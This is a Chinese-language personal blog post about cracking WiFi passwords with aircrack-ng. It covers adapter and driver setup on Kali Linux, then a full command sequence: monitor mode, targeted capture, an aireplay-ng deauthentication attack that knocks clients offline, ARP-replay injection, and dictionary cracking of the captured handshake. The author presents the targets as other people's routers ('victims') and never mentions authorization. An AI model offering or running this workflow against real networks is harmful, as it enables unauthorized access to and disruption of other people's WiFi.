aircrack-ng的使用以及個人苦逼的心路歷程
為什麼要看關於aircrack-ng的東西呢? 因為可以破開WiFi啊 為什麼非要破開WiFi呢? 就是為了裝逼 沒錯!
不開玩笑了啊 進入正題
首先 苦逼的我先看了關於aircrack-ng的資料 不看的話根本就無從入手 瞭解到了一些基本的使用方法 接著就開始進行自己的試驗階段
這時候第一個問題出現了 放圖
既然是無線網路攻擊,那肯定就要用無線網絡卡啊
however!
沒有無線網絡卡 也就是說虛擬機器裡面不識別電腦裡面自帶的網絡卡
好的 實驗到這裡就結束了 bye-bye
我可是學安全的男人啊 怎麼可能這樣就屈服了 既然無法識別內建的網絡卡 那就去買一個usb的無線網絡卡
可是無線網絡卡那麼多 哪一種可以用呢 我就走了彎路 去找了那種有天線的
事實證明 廣告完全就是瞎胡扯 首先 這個網絡卡的驅動不好配 雖然它預置了驅動安裝程式 可是安裝之後 沒有用 物理機識別不了 更不要提虛擬機器了 也可能是我沒有操作好 反正就是不好用 然後我就去小西門換了 對,在小西門買的 就是圖一個可以立即拿到
也沒有準備買很好的 但是老闆看我小 欺負我長得好看 問我要的貴了一點 看他開店房租那麼貴 也就沒有計較這些
好,迴歸正題
這個用的還行 插上虛擬機器以後可以識別出來 一定要在VM的虛擬機器那個選項裡給選上
如果沒有安裝無線網絡卡 那麼你的音效卡下面除了滑鼠 鍵盤 攝像頭以外什麼都沒有 安裝之後會有這個 出現usb和wlan
點選連線 我的有兩個 但是截圖的時候拔掉了網絡卡 所以有一個 插上之後記得兩個都要連線上
接著
可以看到有wlan0了
但是問題又來了 你的無線網絡卡沒有mac地址 沒有驅動 這是情況下會出現什麼問題呢
就是你攔截不到人家的arp請求包 arp request
我之前沒有配 所以抓了二十多萬份 裡面沒有一個請求包 當然了 這種情況可能要兩個原因
1 你的無線網絡卡沒有配置好 沒有裝驅動
2 被害的路由器 韌體不行 你death一下 它卡住了
這種情況下 我更願意去更改自己的配置 這個wifi不行 我還可以襲擊下一個啊 可是要是自己的配置不行 那就永遠不行
這時候 魯大師上場了 驅動檢測 看一下是什麼樣的 千萬不要給它下載驅動 看一下就可以了
我的是rel 8182eu 知道了就好辦了
進入 linux
首先 apt-get update 然後 apt-get upgrade 更新一下源 還有系統軟體
源的話 leafpad /etc/apt/sources.list 開啟 選擇用國內的源
#阿里雲
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清華大學
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙江大學
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
-
#kali官方源
-
deb http://http.kali.org/kali kali-rolling main non-free contrib
-
#中科大的源
-
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
-
deb http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free
-
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free
-
deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
-
deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
其實沒有必要用那麼多 用幾個就差不多了 我選了阿里雲 中科大 浙大 可以適度的增加
都完成以後 就更新一下
接著
apt-get install -y linux-headers-$(uname -r)
這個指令 把headers給下載下來 編譯環境需要用
現在思考一下驅動怎麼辦 需要下載 我在github上找到了
所以就要把它給克隆下來啊 git clone https://github.com/mange/rtl8192eu-linux-driver rtl8192
cd rtl8192
sudo make && sudo make install
接著就需要等一會 很快就好了
然後就會發現自己的無線網絡卡也有了mac 而且襲擊的時候可以用macchanger來修改一下mac地址
好的 前期準備工作結束了 工欲善其事,必先利其器
接著就要開始了
airmon-ng check kill 殺掉所有會妨礙到監聽的程序
airmon-ng start wlan0 開啟無線網絡卡
airodump-ng wlan0mon 開始監聽
附近的wifi都出現了
上面的各個標誌是什麼意思 可以自己查一下
接著選定一個wifi
airodump-ng --bssid 路由器的mac -c 所在頻道 --ivs -w 抓的包存放的地方
這個是開始專門的抓一個WiFi的包 --ivs可以過濾一些包 抓對自己有用的 這樣資料包更小 更方便爆破
不加的話就會抓所有的包 可以看到其他的東西 用來ivs的話 最後的包字尾是ivs 不用的話 cap 應該是這個吧
這時候就開始抓包了
為了得到有效的包 就要開始攻擊它 讓它傳送敏感包 比如一直襲擊已經連線上的客戶端 讓它掉線 只要它掉線了 就會發送登陸請求 這時候就可以抓回來分析了
aireplay-ng -0 20 -a 路由器的mac -c 客戶端的mac wlan0mon
這時候就是death攻擊
還有一種arp攻擊
aireplay-ng -3 -b 路由器的mac -h 客戶端的mac wlan0mon
arp requset注入攻擊 資料包超級多 更好分析
等到
右上角出現 handshake 就可以進行爆破了 按ctrl c 結束
都準備好了以後 開始破解
aircrack-ng -w 字典檔案 cap檔案
字典檔案的話 系統自己帶有wordlist cap就是剛才自己抓到的包
總結一下吧 很苦逼 遇到了很多問題 但是沒有畏懼 遇到了問題就去解決問題 不抱怨 既然選擇了遠方 便只顧風雨兼程